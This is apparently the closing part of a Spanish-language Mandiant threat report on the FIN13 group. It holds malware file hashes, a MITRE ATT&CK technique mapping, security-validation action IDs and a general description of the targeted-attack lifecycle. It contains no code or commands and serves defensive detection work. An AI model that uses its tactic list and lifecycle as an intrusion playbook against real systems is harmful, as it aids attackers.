SHA256

CLOSEWATCH

1c871dba90faeef9cb637046be04f291

ea71757fcd45425353d4c432f8fcef4451cd9b22

e9e25584475ebf08957886725ebc99a2b85af7a992b6c6ae352c94e8d9c79101

DRAWSTRING

f774a1159ec25324c3686431aeb9a038

1f53342aaa71be3d25e6c28dd36f949b7b504a28

2d2a67fcce58c73e96358161e48e8b09fa2b171c837d7539c22461e46c47656c

DRAWSTRING

9a6993ee1af31dc386be4583dd866bfc

67c7469aaaf352705ec66c3bb73366c77cf3577c

77b4da7f513b7bf555e34fd6450a43e869ec9aa037c0e274ace81ae3d9cda94f

Invoke-SMBExec

9e484e32505758a6d991c33652ad1b14

16a71f2ffc1bb24b2862295072831b698ae38f3a

674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd

Invoke-WMIExec

081beadd4dc5f070c087df82df22179c

ca0cc3d624be7a2933413e8d7440374b25eae1bd

b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7

GOBOT2

384fea272567d924c2a256ce9e91d949

0ae8dd21ce229884519cb8e5ed6b2753a18a7ead

d961148e97857562b9cf06a0e2d154352338d60d375f9b48f61e9f26480e443b

HOTLANE

b451fe96ab76cf676cf22a258fdb38ce

8c8ad56ec08a4b23e0593c3d578fd7e23dc45211

4b1b1fd688a5bf4e27a4e62a56b67e1c45536603c8ecdefe88a3b0ff37cec798

HOTLANE

94642e317bdbcc5d216aa730ae851a05

adca9b2d2e9e1c2cfbeb2f730894bf5ba54acad8

906b0e99850448a45ab3de4115954d5ff02b6edd4c2b0f5d59f40045f668246c

JSPRAT

ab2dbe55a54368e0ba4c9a4abe71b47b

7439a49cd10616a7c9d649120dfba7eca7f224b8

c7740484dba2eaac5f3455596df3b8f9c127a9d6f50268bc3375afbff3c6020e

JSPRAT

a4cff691eda32dc11a621d9731fcea73

75b58a5fef77886d697041cfab5c3d6beda21661

efce809b03fe30765837e99bdfa6766d4506f9ba8351ec611979ce16f841e1ac

JSPRAT

8a8597d1bfa42229224c46e38ebed07b

5fc73458f617a7fb12d3c769ea07f5ec61e12153

ba5f9281ac9a9bc7c4684dd96603e033f133c26482734b27be4b6f4b5f74f5ad

JSPRAT

34a8ac7dfc5ce7b4a1992abdb5e0fa15

12f6c27f400e85fb8f075ff7b17f475a383b4499

db3bda73338c164d523c0ab27e774f81921d5ab6518ef667fffd10edf169bfbd

LATCHKEY

0b26021f37f01f00cc6cf880bd3d7f68

4ab56883ddcb3d3e9af22aa73898d5ca7d2250a6

b23621caf5323e2207d8fbf5bee0a9bd9ce110af64b8f5579a80f2767564f917

MAILSLOT

5fe987a61b88e34102002a1f13cfee3d

28333822aab1eeebfb299c845b32a2fa17e7747d

5e59b103bccf5cad21dde116c71e4261f26c2f02ed1af35c0a17218b4423a638

MIMIKATZ

d7af79c4533e3050c47044e41c90e829

463a36c5fb8c8dffc659f9d1eb4509d8f62816e7

c1fb986e7f6fde354382d7b46460fb9af799a0abbac4c179ca9b3f56aadc7f98

NIGHTJAR

b130215dd140fa47d06f6e1d5ad8e941

28427a2778731b3b247edf6a576b8149e9784d28

fa6f93ef0bb35a9dad1a5e60105c7110da3a2f8bd37a4ae3bff7f1a1c61b2720

NIGHTJAR

86327a5429ca8c58685a310b98d1be95

e92c1a2f03f5895889313c8e8f4fea1aa6f24652

5ece301c0e0295b511f4def643bf6c01129803bac52b032bb19d1e91c679cacb

PORTHOLE

f4b56e8b6c0710f1e8a18dc4f11a4edc

2e309fa21194a069feb02ff0cd9cafe06d84f94d

84ac021af9675763af11c955f294db98aeeb08afeacd17e71fb33d8d185feed5

PORTHOLE

33c22962e43cef8627cbc63535f33fce

72906cec6bc424f8a9db5ca28ece2d2d2200dba2

61257b4ef15e20aa9407592e25a513ffde7aba2f323c2a47afbc3e588fc5fcaf

PROCDUMP

42539491f0e4fe145b9ed7d002bcb9ae

ddebbf15665986402e662947c071979329dd1a71

2f1520301536958bcf5c65516ca85a343133b443db9835a58049cd1694460424

PROCDUMP

a92669ec8852230a10256ac23bbf4489

4bed038c66e7fdbbfb0365669923a73fbc9bb8f4

16f413862efda3aba631d8a7ae2bfff6d84acd9f454a7adaa518c7a8a6f375a5

SIXPACK

863ead7a592b47d7547ab7931c935633

f7cc106b208a9c3e4d630627954489dd2b0d5bda

a3676562571f48c269027a069ecb08ee08973b7017f4965fa36a8fa34a18134e

SPINOFF

9e0563caa00582c3aa4bf6c41d9f9c46

4716aeb3076a6b0fd00ec9f5144747270407dcc1

4029788b2cb65282f4264283a359710988380bce22ed67788c8d978b28e0aea9

SWEARJAR

f50efee758de4aa18f0ce9459d5722f4

13dfe71b95d3932ca4e39b84e6ded5086abe2b60

1e675e32ebb61b6259b0df978e3ffa02695ef120f8a2a5639f2ae18e14fd1a4d

SWEARJAR

9340e6fc1d6d6b0379ab1583ccc2a0b1

b0caaf26e52168cb839f12ba499ff1602ce8191b

0463fa109106363b4c87c8909bfcc4bf3ce238566173359108b0a5ae5d749be2

SWEARJAR

6488086b07a36a2842df5b5451b3640b

dda98668eda22cf20897960fc8ffc964ae415582

2f23224937ac723f58e4036eaf1ee766b95ebcbe5b6a27633b5c0efcd314ce36

SWEARJAR

2e9ae2864d368ed1e6747ba28440ba5c

8bfd968026b4268ba7d205871e329717aec2def8

e76e0a692be03fdc5b12483b7e1bd6abd46ad88167cd6b6a88f6185ed58c8841

TINYSHELL

428b47caf74ce986bc3688262355d5b7

dadb1cc49fa8fa577bb6d09e15639ab54dd46c18

0dd4d924c9069992dd7b3e007c0f3ca149b7fb1ce0dfb74b37c7efc6e1aebb46

WMIEXEC

dc78c63a267ef5f894e99aa1e6bfe888

75c728ec83c65348e51ef1e63915a2415886bc9f

0e141b51aa20f518a79185f835491eba65998301eff03133a2969510798bc674

Técnicas de MITRE ATT&CK

Categoría táctica de ATT&CK

Técnicas

Desarrollo de recursos:

Acquire Infrastructure (T1583)

Develop Capabilities (T1587)

Obtain Capabilities (T1588)

Stage Capabilities (T1608)

Acceso inicial:

Exploit Public-Facing Application (T1190)

Ejecución:

Windows Management Instrumentation (T1047)

Scheduled Task/Job (T1053)

Command and Scripting Interpreter (T1059)

Inter-Process Communication (T1559)

System Services (T1569)

Persistencia:

Scheduled Task/Job (T1053)

Create Account (T1136)

Server Software Component (T1505)

Create or Modify System Process (T1543)

Event Triggered Execution (T1546)

Boot or Logon Autostart Execution (T1547)

Escalación de privilegios:

Scheduled Task/Job (T1053)

Process Injection (T1055)

Access Token Manipulation (T1134)

Boot or Logon Autostart Execution (T1547)

Evasión defensiva:

Obfuscated Files or Information (T1027)

Process Injection (T1055)

Indicator Removal on Host (T1070)

Modify Registry (T1112)

Access Token Manipulation (T1134)

Deobfuscate/Decode Files or Information (T1140)

Virtualization/Sandbox Evasion (T1497)

Use Alternate Authentication Material (T1550)

Subvert Trust Controls (T1553)

Impair Defenses (T1562)

Hide Artifacts (T1564)

Hijack Execution Flow (T1574)

Acceso a credenciales:

OS Credential Dumping (T1003)

Network Sniffing (T1040)

Unsecured Credentials (T1552)         

Descubrimiento:

System Service Discovery (T1007)

Query Registry (T1012)

System Network Configuration Discovery (T1016)

Remote System Discovery (T1018)

System Owner/User Discovery (T1033)

Network Sniffing (T1040)

Network Service Scanning (T1046)

System Network Connections Discovery (T1049)

Process Discovery (T1057)

Permission Groups Discovery (T1069)

System Information Discovery (T1082)

File and Directory Discovery (T1083)

Account Discovery (T1087)

Network Share Discovery (T1135)

Virtualization/Sandbox Evasion (T1497)

Software Discovery (T1518)

Movimiento lateral:

Remote Services (T1021)

Use Alternate Authentication Material (T1550)

Colección:

Data from Network Shared Drive (T1039)

Data Staged (T1074)

Data from Information Repositories (T1213)

Archive Collected Data (T1560)

Comando y control:

Proxy (T1090)

Application Layer Protocol (T1071)

Non-Application Layer Protocol (T1095)

Ingress Tool Transfer (T1105)

Data Encoding (T1132)

Protocol Tunneling (T1572)

Encrypted Channel (T1573)

Exfiltración:

Exfiltration Over Web Service (T1567)

Impacto:

Service Stop (T1489)

System Shutdown/Reboot (T1529)

Acciones de Validación de Seguridad de Mandiant

Las organizaciones pueden validar sus controles de seguridad mediante las siguientes acciones con la Validación de Seguridad de Mandiant.

VID 

Nombre  

A102-144 

Command and Control - FIN13, DRAWSTRING, C2 Communication 

A104-905 

Host CLI - FIN13, DRAWSTRING, Exclude From Scanning 

A104-906 

Host CLI - FIN13, DRAWSTRING, Using netsh to Allow Communications 

A104-907 

Host CLI - FIN13, Persistence Using Registry Keys 

A104-908 

Host CLI - FIN13, Persistence Using Schedule Tasks 

A102-119 

Malicious File Transfer - FIN13, CLOSEWATCH, Download, Variant #1 

A102-120 

Malicious File Transfer - FIN13, DRAWSTRING, Download, Variant #1 

A102-121 

Malicious File Transfer - FIN13, DRAWSTRING, Download, Variant #2 

A102-122 

Malicious File Transfer - FIN13, GOBOT2, Download 

A102-123 

Malicious File Transfer - FIN13, JSPRAT, Download, Variant #1 

A102-124 

Malicious File Transfer - FIN13, JSPRAT, Download, Variant #2 

A102-125 

Malicious File Transfer - FIN13, JSPRAT, Download, Variant #3 

A102-126 

Malicious File Transfer - FIN13, JSPRAT, Download, Variant #4 

A102-127 

Malicious File Transfer - FIN13, LATCHKEY, Download 

A102-128 

Malicious File Transfer - FIN13, MAILSLOT, Download 

A102-129 

Malicious File Transfer - FIN13, MIMIKATZ, Download 

A102-130 

Malicious File Transfer - FIN13, NIGHTJAR, Download, Variant #1 

A102-131 

Malicious File Transfer - FIN13, NIGHTJAR, Download, Variant #2 

A102-132 

Malicious File Transfer - FIN13, PORTHOLE, Download, Variant #1 

A102-133 

Malicious File Transfer - FIN13, PORTHOLE, Download, Variant #2 

A102-134 

Malicious File Transfer - FIN13, SIXPACK, Download 

A102-135 

Malicious File Transfer - FIN13, SPINOFF, Download 

A102-136 

Malicious File Transfer - FIN13, SWEARJAR, Download, Variant #1 

A102-137 

Malicious File Transfer - FIN13, SWEARJAR, Download, Variant #2 

A102-138 

Malicious File Transfer - FIN13, SWEARJAR, Download, Variant #3 

A102-139 

Malicious File Transfer - FIN13, SWEARJAR, Download, Variant #4 

A102-140 

Malicious File Transfer - FIN13, TINYSHELL, Download 

A102-141 

Malicious File Transfer - FIN13, WMIEXEC, Download 

A102-142 

Malicious File Transfer - HOTLANE (UPX unpacked), Download 

A102-143 

Malicious File Transfer - HOTLANE, Download, UPX Packed 

A104-909 

Protected Theater - FIN13, GOBOT2, Execution 

Agradecimientos

Este blog no hubiera sido posible sin los esfuerzos excepcionales del equipo de respuesta a incidentes de Mandiant Consulting, los analistas de Managed Defense, los sobresalientes  investigadores de ingeniería inversa del FLARE, el mago de la detección Evan Reese, Jeremy Kennelly por su experiencia, el equipo de colección de Mandiant Threat Intelligence y todos esos ingenieros no reconocidos de Mandiant los cuales mantienen los engranajes engrasados y girando.

APÉNDICE A: CICLO DE VIDA DEL ATAQUE DIRIGIDO

fin13 appendix a

Reconocimiento inicial:  El atacante investiga los sistemas y los empleados de un objetivo y describe una metodología para la intrusión. El atacante puede buscar una infraestructura la cual proporcione acceso remoto a un entorno o investigar a los empleados para atacar con ataques de ingeniería social.

Compromiso inicial: El atacante ejecuta, con éxito, un código malicioso en uno o más sistemas. Esto suele ocurrir como resultado de un ataque de ingeniería social o la explotación de una vulnerabilidad en un sistema conectado a Internet.

Establecer presencia: Inmediatamente después del compromiso inicial, el atacante mantiene un control continuo sobre un sistema recientemente comprometido. El atacante generalmente establece presencia instalando una puerta trasera persistente o descargando utilerías adicionales al sistema comprometido.

Escalación de privilegios: El atacante obtiene más acceso a los sistemas y datos dentro del entorno. Los atacantes a menudo escalan sus privilegios mediante la recolección de credenciales, el registro de pulsaciones de teclas o la subversión de los sistemas de autenticación.

Reconocimiento interno:  El atacante explora el entorno de la organización para comprender mejor la infraestructura, el almacenamiento de información de interés y las funciones y responsabilidades de las personas clave.

Movimiento lateral:  El atacante utiliza cuentas obtenidas de la fase "Escalación de privilegios" y se mueve lateralmente a los sistemas adicionales dentro del entorno comprometido. Las técnicas comunes de movimiento lateral incluyen el acceso a recursos compartidos de archivos de red, la ejecución remota de comandos o el acceso a sistemas por medio de protocolos de inicio de sesión remotos, como servicios de escritorio remoto (RDS) o shell seguro (SSH).

Mantener presencia: El atacante garantiza el acceso continuo al entorno instalando múltiples variantes de puertas traseras o accediendo a servicios de acceso remoto como la red privada virtual corporativa (VPN).


Completar la misión: El atacante logra los objetivos de la intrusión, como el robo de propiedad intelectual, datos financieros, información sobre fusiones y adquisiciones o información de identificación personal (PII). En otros casos, el objetivo de la misión podría ser una interrupción de los sistemas o servicios o la destrucción de datos en el entorno.